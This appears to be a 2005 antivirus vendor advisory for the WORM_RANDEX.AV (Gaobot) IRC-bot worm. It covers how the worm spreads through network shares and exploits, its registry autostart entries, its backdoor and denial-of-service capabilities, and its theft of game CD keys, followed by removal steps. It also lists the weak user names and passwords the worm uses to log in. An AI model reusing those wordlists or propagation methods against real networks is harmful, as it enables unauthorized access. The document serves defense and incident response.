WORM_RANDEX.AV

Malware type: Worm

Aliases: W32/Gaobot.worm

In the wild: Yes

Destructive: No

Language: English

Platform: Windows 95, 98, ME, NT, 2000, XP

Encrypted: No

Overall risk rating:

Reported infections:

Damage potential:

High

Distribution potential:

High

Description: 

This worm arrives as JMV2.EXE on target machines. It spreads by dropping a copy of itself in accessible network shares. If the said shares are password-protected, it uses gathered user names and passwords as its login credentials to gain access.

It exploits known Windows vulnerabilities to propagate itself. For more information read the following pages:

It also has backdoor capabilities. It connects to an Internet Relay Chat (IRC) server where it listens to commands issued by a remote malicious user. This allows the remote malicious user to gain control of the infected machine.

It steals the Microsoft Windows product ID and CD keys of several popular games.

For additional information about this threat, see:

Description created: Mar. 22, 2005 7:28:24 PM GMT -0800


TECHNICAL DETAILS


File type: PE

Memory resident:  Yes

Size of malware: 164,864 Bytes

Initial samples received on: Mar 15, 2005

Compression type: ASProtect

Vulnerability used:  (MS04-011) Security Update for Microsoft Windows (835732), (MS03-007) Unchecked Buffer In Windows Component Could Cause Server Compromise (815021), (MS03-026) Buffer Overrun In RPC Interface Could Allow Code Execution, (MS02-061) Elevation of Privilege in SQL Server Web Tasks (Q316333)

Details:

Installation and Autostart Techniques

Upon execution, this worm drops a copy of itself in the Windows system folder as JMV2.EXE. It then deletes itself after it was executed.

It creates several threads to be used for its key logging and other backdoor capabilities.

It also creates the following registry entries to enable its automatic execution at every system startup:

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
USB DRIVER="Jmv2.exe

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
USB DRIVER="Jmv2.exe"

Network Propagation and Exploits

This worm spreads via network shares using NetBEUI functions. It searches for and lists down the following shared folders, where it drops a copy of itself:

  • ADMIN$\system32
  • C$\WINDOWS\system32
  • C$\WINNT\system32
  • IPC$

It looks for and uses the following weak user names:

  • access
  • backup
  • barbara
  • blank
  • brian
  • bruce
  • capitol
  • cisco
  • compaq
  • control
  • database
  • databasepass
  • databasepassword
  • db1234
  • dbpass
  • dbpassword
  • domain
  • domainpass
  • domainpassword
  • exchange
  • exchnge
  • frank
  • freddy
  • george
  • headoffice
  • heaven
  • internet
  • intranet
  • katie
  • login
  • loginpass
  • nokia
  • oeminstall
  • office
  • orange
  • peter
  • peter
  • siemens
  • spencer
  • sqlpass
  • staff
  • student
  • student1
  • susan
  • teacher
  • technical
  • turnip
  • user1
  • userpassword
  • winpass
  • yellow

It also uses the following weak passwords:

  • 12346
  • 123467
  • 1234678
  • 12346789
  • 123467890
  • accounting
  • accounts
  • admin
  • administrator
  • changeme
  • default
  • guest
  • homeuser
  • internet
  • oemuser
  • outlook
  • pass1234
  • pass1234
  • passwd
  • password
  • password1
  • qwerty
  • server
  • system
  • user1
  • win2000
  • win2k
  • win98
  • windows
  • winnt
  • winxp

It also exploits the following known Windows vulnerabilities:

  • SQL Server Buffer Overflow vulnerability
  • IIS/WEBDAV vulnerability
  • RPC/DCOM vulnerability
  • LSASS vulnerability

More information about these vulnerabilities can be found on the following pages:

Backdoor Capabilities

This worm acts as an Internet Relay Chat (IRC) bot that connects to an IRC server. When a connection is established, it listens for commands issued by a remote malicious user. It then executes these commands locally on the affected machine, providing a remote user virtual control over the affected system.

The bot allows a remote user to do the following:

  • Capture pictures and video clips
  • Change BOT ID
  • Disconnect the bot from IRC
  • Display connection type, local IP address and other network information
  • Display network information
  • Display system information
    • Amount of memory
    • CPU speed
    • Malware uptime
    • User name
    • Windows platform, build version and product ID
  • Display the driver list
  • Download from HTTP and FTP URL
  • Generate a random nickname
  • Get screen capture
  • Issue ping attack on a target computer
  • Let the bot perform mode change
  • List all running process
  • Log on and log off the user
  • Make the bot join a channel
  • Open a command shell
  • Open files
  • Perform different kinds of denial of service (DoS) attacks
  • Rename a file
  • Retrieve and clear log files
  • Send a message to the IRC server
  • Steal CD keys of games
  • Stop and start a thread
  • Terminate the bot
  • Update worm from HTTP and FTP URL

Denial of Service

This worm performs a denial of service (DoS) attack by performing the following flood attacks on random IP addresses:

  • HTTP flood
  • ICMP flood
  • SYN flood
  • UDP flood

Information Theft

This worm steals the Microsoft Windows product ID and CD keys of the following games:

  • Battlefield 1942
  • Battlefield 1942 (Road To Rome)
  • Battlefield 1942 (Secret Weapons of WWII)
  • Battlefield Vietnam
  • Black and White
  • Chrome
  • Command and Conquer: Generals
  • Command and Conquer: Generals (Zero Hour)
  • Command and Conquer: Red Alert
  • Command and Conquer: Red Alert 2
  • Command and Conquer: Tiberian Sun
  • Counter-Strike (Retail)
  • FIFA 2002
  • FIFA 2003
  • Freedom Force
  • Global Operations
  • Gunman Chronicles
  • Half-Life
  • Hidden & Dangerous 2
  • IGI 2: Covert Strike
  • Industry Giant 2
  • James Bond 007: Nightfire
  • Legends of Might and Magic
  • Medal of Honor: Allied Assault
  • Medal of Honor: Allied Assault: Breakthrough
  • Medal of Honor: Allied Assault: Spearhead
  • Nascar Racing 2002
  • Nascar Racing 2003
  • Need For Speed Hot Pursuit 2
  • Need For Speed: Underground
  • Neverwinter Nights (Hordes of the Underdark)
  • Neverwinter Nights (Shadows of Undrentide)
  • NHL 2002
  • NHL 2003
  • Rainbow Six III RavenShield
  • Shogun: Total War: Warlord Edition
  • Soldier of Fortune II - Double Helix
  • Soldiers Of Anarchy
  • The Gladiators
  • Unreal Tournament 2003
  • Unreal Tournament 2004

Other Details

This worm runs on Windows 95, 98, ME, NT, 2000, and XP.

Analysis By: Dexter See To


SOLUTION


Minimum scan engine version needed: 6.810

Pattern file needed: 2.473.04

Pattern release date: Mar 6, 2005


Important note: The "Minimum scan engine" refers to the earliest Trend Micro scan engine version guaranteed to detect this threat. However, Trend Micro strongly recommends that you update to the latest version in order to get comprehensive protection. Download the latest scan engine here.

Solution:

Identifying the Malware Program

To remove this malware, first identify the malware program.

  1. Scan your system with your Trend Micro antivirus product.
  2. NOTE all files detected as WORM_RANDEX.AV.

Trend Micro customers need to download the latest pattern file before scanning their system. Other users can use Housecall, Trend Micro's online virus scanner.

Terminating the Malware Program

Since this malware terminates the task manager, you have to download a third party process viewer such as Process Explorer in order to terminate this malware.

Removing Autostart Entries from the Registry

Removing autostart entries from the registry prevents the malware from executing at startup.

  1. Open Registry Editor. Click Start>Run, type REGEDIT, then press Enter.
  2. In the left panel, double-click the following:
    HKEY_LOCAL_MACHINE>Software>Microsoft>
    Windows>CurrentVersion>Run
  3. In the right panel, locate and delete the entry:
    USB DRIVER = "Jmv2.exe"
  4. In the left panel, double-click the following:
    HKEY_CURRENT_USER>Software>Microsoft>
    Windows>CurrentVersion>Run
  5. In the right panel, locate and delete the entry:
    USB DRIVER = "Jmv2.exe"
  6. Close Registry Editor.

NOTE:If you were not able to terminate the malware process as described in the previous procedure, restart your system.

Additional Windows ME/XP Cleaning Instructions

Users running Windows ME and XP must disable System Restore to allow full scanning of infected systems.

Users running other Windows versions can proceed with the succeeding procedure set(s).

Running Trend Micro Antivirus

Scan your system with Trend Micro antivirus and delete files detected as WORM_RANDEX.AV. To do this, Trend Micro customers must download the latest pattern file and scan their system. Other Internet users can use HouseCall, Trend Micro's online virus scanner.

Applying Patches

This malware exploits known Windows vulnerabilities. Download and install the following patches supplied by Microsoft:

Refrain from using this product until the appropriate patch has been installed. Trend Micro advises users to download critical patches upon release by vendors.




Trend Micro offers best-of-breed antivirus and content-security solutions for your corporate network, small and medium business, mobile device or home PC.